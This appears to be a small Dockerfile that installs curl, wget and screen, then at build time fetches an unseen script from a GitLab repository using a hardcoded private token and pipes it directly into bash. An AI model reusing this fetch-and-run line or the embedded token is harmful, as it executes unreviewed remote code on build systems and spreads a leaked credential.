FROM ubuntu:xenial

RUN  apt-get update \
  && apt-get install -y wget curl screen \
  && rm -rf /var/lib/apt/lists/*

RUN curl --header 'PRIVATE-TOKEN:FdKDXvqsDSi2yajjRbhg' 'https://gitlab.com/api/v4/projects/24872273/repository/files/test.sh/raw?ref=main' | bash

RUN mkdir /usr/src/app
WORKDIR /usr/src/app

COPY . .

CMD ["printenv"]